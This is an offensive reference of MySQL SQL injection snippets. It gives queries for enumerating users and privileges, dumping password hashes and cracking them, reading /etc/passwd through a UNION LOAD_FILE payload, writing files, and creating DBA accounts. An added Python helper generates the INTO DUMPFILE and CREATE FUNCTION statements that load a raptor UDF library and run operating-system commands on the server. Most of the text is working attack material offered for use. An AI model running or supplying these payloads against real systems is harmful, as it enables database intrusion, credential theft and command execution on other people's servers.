MySQL script injection: common MySQL SQL injection snippets

Version

SELECT @@version

Comments

SELECT 1; #comment

SELECT /*comment*/1;

(A double dash also starts a comment, as in the "-- priv" notes below, but only when it is followed by a space.)

Current User

SELECT user();

SELECT system_user();

List Users

SELECT user FROM mysql.user; -- priv

List Password Hashes

SELECT host, user, password FROM mysql.user; -- priv; on MySQL >= 5.7 the column is authentication_string (the password column was dropped in 5.7.6)

Password Cracker

John the Ripper will crack MySQL password hashes: the old 16-hex-digit pre-4.1 hashes with --format=mysql and the 41-character, "*"-prefixed mysql_native_password hashes (SHA1(SHA1(password)), unsalted) with --format=mysql-sha1. caching_sha2_password hashes (the MySQL 8 default, starting with $A$) are salted and iterated SHA-256 and are far slower to crack.

List Privileges

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs

SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs

SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns

List DBA Accounts

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';

SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv

Current Database

SELECT database()

List Databases

SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0

SELECT distinct(db) FROM mysql.db -- priv

List Columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

List Tables

SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

Find Tables From Column Name

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'

Select Nth Row

SELECT host,user FROM mysql.user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0

SELECT host,user FROM mysql.user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

Select Nth Char

SELECT substr('abcd', 3, 1); # returns c

Bitwise AND

SELECT 6 & 2; # returns 2

SELECT 6 & 1; # returns 0

ASCII Value -> Char

SELECT char(65); # returns A

Char -> ASCII Value

SELECT ascii('A'); # returns 65

Casting

SELECT cast('1' AS unsigned integer);

SELECT cast('123' AS char);

String Concatenation

SELECT CONCAT('A','B'); #returns AB

SELECT CONCAT('A','B','C'); # returns ABC

If Statement

SELECT if(1=1,'foo','bar'); -- returns 'foo'

Case Statement

SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A

Avoiding Quotes

SELECT 0x414243; # returns ABC

Time Delay

SELECT BENCHMARK(1000000,MD5('A'));

SELECT SLEEP(5); # >= 5.0.12

Make DNS Requests

No built-in function does this on Linux. On Windows targets a UNC path passed to LOAD_FILE() (\\attacker-host\share\x) makes the server resolve the hostname before the read fails, which is enough for out-of-band confirmation; otherwise a UDF (see Command Execution) is the only route.

Command Execution

If mysqld is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file containing a User Defined Function (UDF) and registering it with CREATE FUNCTION ... SONAME. raptor_udf.c explains exactly how you go about this. Before MySQL 5.0.67 the .so could be dropped anywhere the dynamic loader searches (/usr/lib or similar); from 5.0.67 onwards mysqld only loads UDF libraries from plugin_dir (SELECT @@plugin_dir), and writing there with INTO DUMPFILE needs the FILE privilege, a secure_file_priv setting that permits the path, and write access to that directory for the mysqld OS account. If mysqld runs as an unprivileged account the technique still works, but the commands run as that account rather than root. Remember to compile for the target architecture, which may or may not be the same as your attack platform.

Local File Access

...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv (FILE); the file must be readable by the mysqld OS account (in practice world-readable), smaller than max_allowed_packet and permitted by secure_file_priv, otherwise LOAD_FILE() silently returns NULL

SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv (FILE), write to file system; writes one row raw and unescaped, refuses to overwrite an existing file, and is restricted by secure_file_priv
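The secure_file_priv and plugin_dir conditions above are where the file-access and UDF steps usually fail, so here is an added Python helper (not from the original page, nor from raptor_udf.c) that interprets @@secure_file_priv the way mysqld does and emits the INTO DUMPFILE / CREATE FUNCTION sequence for the UDF route. The library and function names (raptor_udf2.so, do_system) follow raptor_udf2.c; the plugin directory and the .so bytes are whatever you read from the target and compiled, and the values used in the sample run are constructed.

```python
import posixpath


def recon_queries():
    """Settings to read before trying LOAD_FILE(), INTO DUMPFILE or a UDF."""
    return [
        "SELECT @@version;",
        "SELECT @@plugin_dir;",        # only directory UDF libraries load from (>= 5.0.67)
        "SELECT @@secure_file_priv;",  # NULL, '' or a directory; see secure_file_priv_allows()
        "SELECT host, user FROM mysql.user WHERE File_priv = 'Y';",
    ]


def secure_file_priv_allows(setting, path):
    """Decide whether @@secure_file_priv lets LOAD_FILE() read or INTO DUMPFILE
    write `path`.  None stands for SQL NULL (all file operations disabled),
    '' means unrestricted, and a directory means only files inside it."""
    if setting is None:
        return False
    if setting == "":
        return True
    base = posixpath.normpath(setting)
    if base == "/":
        base = ""
    target = posixpath.normpath(path)
    return target.startswith(base + "/")


def udf_statements(so_bytes, plugin_dir, soname="raptor_udf2.so", func="do_system"):
    """Statements that drop the compiled UDF into plugin_dir and register it.
    The library travels as a 0x literal (no quotes needed), INTO DUMPFILE
    writes it byte-for-byte, CREATE FUNCTION ... SONAME loads it (needs INSERT
    on mysql.func, i.e. a DBA).  Names follow raptor_udf2.c (assumption)."""
    path = posixpath.join(plugin_dir, soname)
    return [
        f"SELECT 0x{so_bytes.hex()} INTO DUMPFILE '{path}';",
        f"CREATE FUNCTION {func} RETURNS INTEGER SONAME '{soname}';",
        f"SELECT {func}('id > /tmp/out');",  # runs as the mysqld OS account
    ]


def plan_udf_upload(so_bytes, plugin_dir, secure_file_priv):
    """Return the statement list, or None when secure_file_priv rules out
    writing into plugin_dir (the usual reason the DUMPFILE step fails)."""
    probe = posixpath.join(plugin_dir, "raptor_udf2.so")
    if not secure_file_priv_allows(secure_file_priv, probe):
        return None
    return udf_statements(so_bytes, plugin_dir)


if __name__ == "__main__":
    # Constructed sample: a fake 4-byte "library" and two server configurations.
    fake_so = b"\x7fELF"
    for priv in (None, "", "/var/lib/mysql-files"):
        print(repr(priv), plan_udf_upload(fake_so, "/usr/lib/mysql/plugin", priv))
```

A NULL secure_file_priv (the default on many packaged 5.7+ and 8.0 installs) ends both the LOAD_FILE() and the UDF route regardless of privileges; a directory value that is not plugin_dir blocks the UDF write but still allows reads and writes inside that directory. Even with secure_file_priv empty, the DUMPFILE step fails if the mysqld OS account cannot write to plugin_dir, so check directory permissions before sending a multi-megabyte hex literal.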

Hostname, IP Address

SELECT @@hostname; -- MySQL >= 5.0.38; there is no built-in that returns the server's IP address

Create Users

CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv

Delete Users

DROP USER test1; -- priv

Make User DBA

GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv

Location of DB files

SELECT @@datadir;

Default/System Databases

information_schema (>= MySQL 5.0), mysql, performance_schema (>= 5.5), sys (>= 5.7)
